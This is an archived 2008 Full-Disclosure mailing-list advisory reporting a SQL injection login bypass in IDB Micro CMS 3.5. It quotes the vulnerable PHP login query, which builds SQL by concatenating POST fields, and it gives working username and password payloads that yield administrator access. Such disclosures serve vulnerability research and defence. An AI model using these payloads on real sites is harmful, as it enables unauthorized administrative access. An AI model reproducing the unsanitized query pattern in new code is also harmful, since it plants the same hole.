[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [SkyOut/Wired Security] SQL Injection in IDB Micro CMS 3.5 (Login Bypass)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] [SkyOut/Wired Security] SQL Injection in IDB Micro CMS 3.5 (Login Bypass)
From: <skyout.fd@xxxxxxxxxxxxxxxxxx>
Date: Mon, 12 May 2008 18:39:52 +0200

Hey guys,

I came accross a SQL Injection bug in IBD Micro CMS in version 3.5
and maybe lower...

News about it:
http://wired-security.net/archive/2008/may/index.php#12052008
Advisory to read:
http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt

---

In Short:

--- SNIP ---
if ($i == 0) {
        $sql = '
                SELECT *
                FROM microcms_administrators
                WHERE administrators_username = "' . 
$_POST['administrators_username'] .
'" and
                        administrators_pass = PASSWORD("' . 
$_POST['administrators_pass'] .
'")';
        $user_result = mysql_query($sql);
--- SNIP ---

Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("

Will result in:

--- SNIP ---
$sql = '
SELECT *
FROM microcms_administrators
WHERE administrators_username = "" or "1" = "1" and
administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
--- SNIP ---

-> Logged in as administrator!

Greets,
SkyOut/Wired Security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [SECURITY] [DSA 1574-1] New icedove packages fix several vulnerabilities
Next by Date: [Full-disclosure] [ GLSA 200805-11 ] Chicken: Multiple vulnerabilities
Previous by thread: [Full-disclosure] [SECURITY] [DSA 1574-1] New icedove packages fix several vulnerabilities
Next by thread: [Full-disclosure] [ GLSA 200805-11 ] Chicken: Multiple vulnerabilities
Index(es):
- Date
- Thread